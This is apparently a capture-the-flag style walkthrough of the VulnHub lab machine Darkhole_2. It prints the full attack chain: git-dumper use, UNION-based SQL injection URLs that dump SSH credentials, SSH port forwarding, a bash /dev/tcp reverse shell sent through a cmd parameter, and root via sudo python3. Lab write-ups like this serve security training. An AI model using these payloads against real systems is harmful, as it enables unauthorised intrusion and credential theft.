Home Lab Setup Case 1 Case 2 Case 3 HackTheBox Vulnhub Offsec Proving Grounds

Darkhole_2 (VulnHub – Easy)

Darkhole_2 is a compact but satisfying machine that chains together Git repository leakage, SQL injection, SSH credential extraction, and a simple privilege escalation through a locally exposed web service. The foothold is obtained by dumping a .git directory and recovering hardcoded credentials. Privilege escalation is achieved by tunneling to a hidden localhost service and abusing its command execution functionality.

Overview

Target: 10.10.10.7
Initial vector: exposed .git → SQL injection → SSH
Privilege escalation: SSH port‑forward → internal RCE → sudo python3

Enumeration

Host Discovery

$ sudo arp-scan -I eth0 --localnet
# or
$ sudo netdiscover -r 10.10.10.0/24

Port Scan

$ sudo nmap -p- --open -sS --min-rate=5000 -n -Pn -vvv 10.10.10.7 -oG Ports.txt

Service Scan

$ sudo nmap -p22,80 -sCV -Pn -n -vvv 10.10.10.7 -oN Services.txt

Port 80 exposes a website with an accessible .git directory.

Foothold – Dumping the Git Repository

Dump the repo:

$ git-dumper http://10.10.10.7/.git the_git_dir
$ cd the_git_dir
$ git log
$ git diff

A commit reveals hardcoded credentials: 

lush@admin.com : 321

Login succeeds, exposing a parameter vulnerable to SQL injection.

SQL Injection → Credential Extraction

Enumerate tables:

http://10.10.10.7/dashboard.php?id=NULL' UNION SELECT 1,TABLE_NAME,2,3,4,5 FROM INFORMATION_SCHEMA.TABLES-- -

Enumerate columns:

http://10.10.10.7/dashboard.php?id=NULL' UNION SELECT 1,GROUP_CONCAT(COLUMN_NAME),2,3,4,5 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='ssh'-- -

Dump SSH credentials:

http://10.10.10.7/dashboard.php?id=NULL' UNION SELECT 1,user,pass,4,5,6 FROM ssh-- -

Recovered credentials: 

jehad : fool

Gaining Access

$ ssh jehad@10.10.10.7

Inside .bash_history, a clue appears: a local webserver running on 127.0.0.1:9999 with a ?cmd= parameter.

Privilege Escalation

Port‑forward the internal service

$ ssh -L 9999:127.0.0.1:9999 jehad@10.10.10.7

Visit: 

http://localhost:9999?cmd=id
-> losy

Reverse Shell

Listener:

$ nc -nlvp 443

Trigger:

http://localhost:9999?cmd=bash -c 'bash -i %26%3E /dev/tcp/10.10.10.9/443 0%3E%261'

A shell is obtained as losy.

Root via sudo python3

$ sudo -l
-> (root) NOPASSWD: /usr/bin/python3

Exploit:

$ sudo python3 -c 'import os; os.system("bash")'

Root shell obtained.

Conclusion

Darkhole_2 is a compact exploitation chain: Git leakage → SQL injection → SSH → internal service RCE → sudo python3. It’s a great example of how small misconfigurations compound into full system compromise.